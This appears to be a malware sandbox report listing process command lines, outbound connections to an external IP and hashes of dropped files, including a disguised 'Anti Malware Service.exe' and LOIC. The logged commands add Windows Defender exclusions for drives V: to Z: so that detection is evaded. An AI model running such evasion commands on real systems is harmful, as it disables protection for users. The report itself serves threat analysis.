C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| N/A | 127.0.0.1:3334 | | tcp |
| DE | 193.161.193.99:21265 | | tcp |
| N/A | 127.0.0.1:3334 | | tcp |
| DE | 193.161.193.99:21265 | | tcp |
| N/A | 127.0.0.1:3334 | | tcp |
| DE | 193.161.193.99:21265 | | tcp |
| N/A | 127.0.0.1:3334 | | tcp |
| DE | 193.161.193.99:21265 | | tcp |
Files
memory/1780-0-0x00007FF8B0ED3000-0x00007FF8B0ED5000-memory.dmp
memory/1780-1-0x0000000000630000-0x0000000000AEE000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/4908-31-0x00000000005F0000-0x0000000000606000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/1596-37-0x0000000000120000-0x0000000000148000-memory.dmp
memory/4908-38-0x00007FF8B0ED0000-0x00007FF8B1991000-memory.dmp
memory/4196-41-0x0000012357680000-0x00000123576A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5vyfptr.fr5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb1ad317bd25b55b2bbdce8a28a74a94 |
| SHA1 | 98a3978be4d10d62e7411946474579ee5bdc5ea6 |
| SHA256 | 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98 |
| SHA512 | d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f18cdd5d9abaa5ed52be8004a11dc037 |
| SHA1 | 9ba656b97d13da0d686e8757d9eaeaf735675826 |
| SHA256 | 53b358ebb88b3f7adcf45de224a5f9fbfb7d98c7c650afe61a4fc8e1bcc16dfb |
| SHA512 | c4a771038ac2d0360d7318168a6f785db0bd1884abd0a6993b974536d0681dbef5e2df39cf781f5fbf4264a9d294bb6b905931d840289af7b81066cc8ba86a7e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c8179aaa149c0b9791b73ce44c04d1 |
| SHA1 | 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff |
| SHA256 | c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a |
| SHA512 | 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3 |
C:\Users\Admin\AppData\Local\Temp\tmp5FC3.tmp.bat
| MD5 | eb0f989e9608506b93f72fd01122de06 |
| SHA1 | 1af35cf9188f425942c28a7350a184ff707dcb55 |
| SHA256 | b6cff43976835e2d865f31791373452d7898b82c80086e03dbb75473dbc30aad |
| SHA512 | b26d96fc46bcf2fffb937e1c1075dfe073675123eb6e732d4e90a6fd276f0bcf4354d0fc53b4b0e0d80eb573cc316a3851e0d70cadae74303d405d6b87d4f4ea |
memory/4908-103-0x00007FF8B0ED0000-0x00007FF8B1991000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71f0e090d65b6fefff8889d5819e2b41 |
| SHA1 | 88c8d0b5e28cce1741072a55d2ef8263733fde63 |
| SHA256 | 4a06b1ccf7ebbdd4e83a7df9d851fd42bccf25ed2c54a43039cd4d797ad7cd1d |
| SHA512 | 62357a39111a6f41f694f23ea12f69ba62ec3cf865680527a5631cb3a3bc7ba19ce7ad1a493af5001fe44bb7a2bfa5b7feaa5d9b5882ed3c33b5dcf93572d3f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7cc007980e419d553568a106210549a |
| SHA1 | c03099706b75071f36c3962fcc60a22f197711e0 |
| SHA256 | a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165 |
| SHA512 | b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e70d51b7df8fa37bc73c0e70b4e82d34 |
| SHA1 | b342ac333afab91ec92ce0ab690f17e43d87d661 |
| SHA256 | 1bd613817d479000e6e248c022b3521a8d64484b0e755ded0a2d043c32945730 |
| SHA512 | 6cd05079ba29b479347cac367987c12e97cdb78f547ac3f95f5e84575e7df2bbe4f721fa3c9cda48fb7194f7f765cdbd3898b4c3b9fe646d90549ec726f1cff8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 919d9e239eac75091ddcacd2697a8de5 |
| SHA1 | e22b8bc440a99c72b1fae6ee14086093c302d94b |
| SHA256 | c5a5f01b328c5cf7fa6bd4c5c09301a7f280ab70e223c1d1a40d2857ff5c5e12 |
| SHA512 | 9c1a25a4708d76d805d71c809fd9aa5e9c511b414c9139bf7cea1bfcf75d3b27d57cfcc6d795238bc00755f79b177470fe1a68e77f8ea71134000712aef0d7d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04f1d68afbed6b13399edfae1e9b1472 |
| SHA1 | 8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0 |
| SHA256 | f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de |
| SHA512 | 30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2524e72b0573fa94e9cb8089728a4b47 |
| SHA1 | 3d5c4dfd6e7632153e687ee866f8ecc70730a0f1 |
| SHA256 | fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747 |
| SHA512 | 99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4db2a8eea384d533ccbb985ee5f9ae4 |
| SHA1 | 6e02b9040fb183935ad9b7d5c275a38dedd8bbcb |
| SHA256 | 46addd3ed52002f573e9e13c1f177e50e6067f9f4987e64e18bb0733044e46af |
| SHA512 | 0a1ba4809aed0a7965875c7a56fccf9c715ff7d7c6b570b7b19dde498ed765d7c61a48e6fb53cf9577415933ce0974c17a820660829b1a4f11851b912ead1f4e |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/4712-342-0x0000020062720000-0x0000020062721000-memory.dmp
memory/908-343-0x00007FF694360000-0x00007FF6947E7000-memory.dmp
memory/2072-344-0x00007FF795DE0000-0x00007FF795ECB000-memory.dmp